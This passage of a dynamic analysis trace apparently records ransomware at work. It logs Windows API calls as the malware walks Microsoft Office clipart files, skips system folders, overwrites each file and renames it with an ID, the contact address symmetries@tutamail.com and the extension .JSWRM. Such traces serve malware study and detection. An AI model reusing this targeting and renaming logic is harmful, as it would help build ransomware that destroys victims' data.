lpUsedDefaultChar=0x0) returned 5 [0097.100] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0097.100] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01560_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01560_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0097.100] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=17328) returned 1 [0097.100] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.100] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x43b0) returned 0x24d210 [0097.101] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x43b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x43b0, lpOverlapped=0x0) returned 1 [0097.105] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.105] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x43b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x43b0, lpOverlapped=0x0) returned 1 [0097.105] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0097.105] CloseHandle (hObject=0x314) returned 1 [0097.105] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0097.105] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0097.105] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0097.105] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0097.105] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0097.105] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0097.105] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0097.105] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a390 [0097.105] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a390, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0097.105] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a390 | out: hHeap=0x1e0000) returned 1 [0097.105] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0097.105] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0097.105] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0097.105] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0097.105] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01560_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01560_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01560_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01560_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0097.106] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0097.106] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0097.106] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0097.106] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103ac532, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103ac532, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103ac532, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x59d8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO01561_.WMF", cAlternateFileName="")) returned 1 [0097.106] lstrcmpiW (lpString1="SO01561_.WMF", lpString2=".") returned 1 [0097.106] lstrcmpiW (lpString1="SO01561_.WMF", lpString2="..") returned 1 [0097.106] lstrcmpiW (lpString1="SO01561_.WMF", lpString2="...") returned 1 [0097.106] lstrcmpiW (lpString1="SO01561_.WMF", lpString2="windows") returned -1 [0097.106] lstrcmpiW (lpString1="SO01561_.WMF", lpString2="recovery") returned 1 [0097.106] lstrcmpiW (lpString1="SO01561_.WMF", lpString2="perflogs") returned 1 [0097.106] lstrcmpiW (lpString1="SO01561_.WMF", lpString2="documents and settings") returned 1 [0097.106] lstrcmpiW (lpString1="SO01561_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0097.106] lstrcmpiW (lpString1="SO01561_.WMF", lpString2="system volume information") returned -1 [0097.106] lstrcmpiW (lpString1="SO01561_.WMF", lpString2="msocache") returned 1 [0097.107] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0097.107] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO01561_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.107] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO01561_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO01561_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.107] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0097.107] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0097.107] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO01561_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.107] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO01561_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO01561_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.107] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0097.107] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0097.107] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0097.107] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0097.107] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0097.107] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0097.107] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01561_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01561_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0097.107] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=23000) returned 1 [0097.107] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.107] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x59d0) returned 0x24d210 [0097.108] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x59d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x59d0, lpOverlapped=0x0) returned 1 [0097.110] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.110] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x59d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x59d0, lpOverlapped=0x0) returned 1 [0097.110] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0097.111] CloseHandle (hObject=0x314) returned 1 [0097.111] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0097.111] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0097.111] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0097.111] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0097.111] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0097.111] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0097.111] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0097.111] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0097.111] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0097.111] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0097.111] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0097.111] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0097.111] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0097.111] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0097.111] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01561_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01561_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01561_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01561_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0097.112] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0097.112] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0097.112] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0097.112] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103ac532, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103ac532, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103ac532, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x75ca, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO01563_.WMF", cAlternateFileName="")) returned 1 [0097.112] lstrcmpiW (lpString1="SO01563_.WMF", lpString2=".") returned 1 [0097.112] lstrcmpiW (lpString1="SO01563_.WMF", lpString2="..") returned 1 [0097.112] lstrcmpiW (lpString1="SO01563_.WMF", lpString2="...") returned 1 [0097.112] lstrcmpiW (lpString1="SO01563_.WMF", lpString2="windows") returned -1 [0097.112] lstrcmpiW (lpString1="SO01563_.WMF", lpString2="recovery") returned 1 [0097.112] lstrcmpiW (lpString1="SO01563_.WMF", lpString2="perflogs") returned 1 [0097.112] lstrcmpiW (lpString1="SO01563_.WMF", lpString2="documents and settings") returned 1 [0097.112] lstrcmpiW (lpString1="SO01563_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0097.112] lstrcmpiW (lpString1="SO01563_.WMF", lpString2="system volume information") returned -1 [0097.112] lstrcmpiW (lpString1="SO01563_.WMF", lpString2="msocache") returned 1 [0097.112] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0097.113] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO01563_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.113] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO01563_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO01563_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.113] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0097.113] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0097.113] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO01563_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.113] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO01563_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO01563_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.113] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0097.113] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0097.113] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0097.113] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0097.113] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0097.113] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0097.113] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01563_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01563_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0097.114] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=30154) returned 1 [0097.114] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.114] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x75c0) returned 0x24d210 [0097.114] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x75c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x75c0, lpOverlapped=0x0) returned 1 [0097.117] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.117] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x75c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x75c0, lpOverlapped=0x0) returned 1 [0097.118] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0097.118] CloseHandle (hObject=0x314) returned 1 [0097.118] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0097.118] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0097.118] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0097.118] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0097.119] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0097.119] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0097.119] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0097.119] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0097.119] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0097.119] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0097.119] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0097.119] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0097.119] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0097.119] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0097.119] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01563_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01563_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01563_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01563_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0097.120] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0097.120] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0097.120] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0097.120] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103ac532, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103ac532, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103ac532, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x51a8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO01566_.WMF", cAlternateFileName="")) returned 1 [0097.120] lstrcmpiW (lpString1="SO01566_.WMF", lpString2=".") returned 1 [0097.120] lstrcmpiW (lpString1="SO01566_.WMF", lpString2="..") returned 1 [0097.120] lstrcmpiW (lpString1="SO01566_.WMF", lpString2="...") returned 1 [0097.120] lstrcmpiW (lpString1="SO01566_.WMF", lpString2="windows") returned -1 [0097.120] lstrcmpiW (lpString1="SO01566_.WMF", lpString2="recovery") returned 1 [0097.120] lstrcmpiW (lpString1="SO01566_.WMF", lpString2="perflogs") returned 1 [0097.120] lstrcmpiW (lpString1="SO01566_.WMF", lpString2="documents and settings") returned 1 [0097.120] lstrcmpiW (lpString1="SO01566_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0097.120] lstrcmpiW (lpString1="SO01566_.WMF", lpString2="system volume information") returned -1 [0097.120] lstrcmpiW (lpString1="SO01566_.WMF", lpString2="msocache") returned 1 [0097.120] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0097.120] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO01566_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.120] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO01566_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO01566_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.120] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0097.120] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0097.120] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO01566_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.120] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO01566_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO01566_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.120] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0097.120] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0097.120] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0097.120] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0097.121] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0097.121] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0097.121] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01566_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01566_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0097.121] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=20904) returned 1 [0097.121] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.121] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x51a0) returned 0x24d210 [0097.122] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x51a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x51a0, lpOverlapped=0x0) returned 1 [0097.173] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.173] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x51a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x51a0, lpOverlapped=0x0) returned 1 [0097.173] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0097.173] CloseHandle (hObject=0x314) returned 1 [0097.173] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0097.173] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0097.173] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0097.173] MultiByteToWideChar (in: CodePage=0x0, 